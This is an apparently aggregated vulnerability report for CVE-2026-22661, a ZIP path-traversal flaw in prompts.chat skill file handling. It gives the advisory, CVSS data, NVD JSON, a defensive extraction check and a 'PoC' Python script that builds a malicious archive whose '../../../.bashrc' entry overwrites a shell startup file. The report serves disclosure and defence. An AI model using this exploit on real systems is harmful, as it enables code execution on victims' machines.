Security Vulnerability Report
CVE-2026-22661 CVSS 8.1 HIGH

Published: 2026-04-03 21:17:09
Last Modified: 2026-04-13 18:23:33

Description

prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution.
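As an added defender-side example (not part of the advisory or the prompts.chat code base), this is the pre-extraction check a skill-installing client needs for the flaw described above: resolve each entry's destination and refuse the whole archive if any entry would land outside the skills directory. The skills directory path and the archive contents are constructed for the demonstration.

```python
import io
import os
import zipfile


def build_sample_archive(include_traversal: bool) -> bytes:
    """Constructed sample (not from the advisory): a legitimate skill file plus,
    optionally, an entry named with the "../" sequence the advisory describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("my-skill/SKILL.md", "# demo skill\n")
        if include_traversal:
            # ZipInfo does not sanitise names at write time, so this is stored as-is.
            zf.writestr("../../../.bashrc", "# would land outside the skills dir\n")
    return buf.getvalue()


def unsafe_entries(archive: bytes, dest_dir: str) -> list[str]:
    """Return entry names whose resolved destination lies outside dest_dir.

    Checking the resolved path (not grepping for "../") also catches absolute
    names and backslash separators. The check is explicit rather than delegated
    to the extraction library: the advisory's vulnerable tools did not do it.
    """
    root = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
            if os.path.commonpath([root, target]) != root:
                bad.append(name)
    return bad


def safe_extract(archive: bytes, dest_dir: str) -> list[str]:
    """Extract all-or-nothing: refuse the whole archive if any entry escapes.

    Rejecting up front avoids leaving a half-installed skill behind.
    Returns the names written on success.
    """
    bad = unsafe_entries(archive, dest_dir)
    if bad:
        raise ValueError(f"archive rejected, entries escape {dest_dir!r}: {bad}")
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        zf.extractall(dest_dir)
        return zf.namelist()
```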

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:* - VULNERABLE
prompts.chat < commit 0f8d4c3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import zipfile

# Create a malicious zip file demonstrating the path traversal
# Proof of Concept for CVE-2026-22661
malicious_zip = "malicious_skill.zip"

# Payload content that will be written to the target file
# In a real attack, this could be a reverse shell script or malicious alias
payload_content = "echo 'System compromised via CVE-2026-22661' >> /tmp/pwned.txt\n"

try:
    with zipfile.ZipFile(malicious_zip, 'w') as zf:
        # Use ZipInfo to construct a filename with path traversal sequences
        # The goal is to write to the user's home directory, e.g., overwriting .bashrc
        zinfo = zipfile.ZipInfo(filename="../../../.bashrc")
        # Set a generic date time for the zip entry
        zinfo.date_time = (2026, 4, 3, 12, 0, 0)
        # Write the payload to the zip entry
        zf.writestr(zinfo, payload_content)
    print(f"[+] Successfully created malicious ZIP file: {malicious_zip}")
    print("[+] When extracted by a vulnerable prompts.chat version, this will attempt to overwrite .bashrc")
except Exception as e:
    print(f"[-] Error creating zip file: {e}")
```

References

https://github.com/f/prompts.chat/commit/0f8d4c381abd7b2d7478c9fdee9522149c2d65e5 (Patch)
https://github.com/f/prompts.chat/pull/1101 (Issue Tracking, Patch, Vendor Advisory)
https://www.vulncheck.com/advisories/prompts-chat-path-traversal-via-skill-file-handling (Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-22661", "sourceIdentifier": "[email protected]", "published": "2026-04-03T21:17:08.970", "lastModified": "2026-04-13T18:23:32.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-25", "matchCriteriaId": "2231F343-295D-417B-9925-BA342FB6A8F0"}]}]}], "references": [{"url": "https://github.com/f/prompts.chat/commit/0f8d4c381abd7b2d7478c9fdee9522149c2d65e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/f/prompts.chat/pull/1101", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/prompts-chat-path-traversal-via-skill-file-handling", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```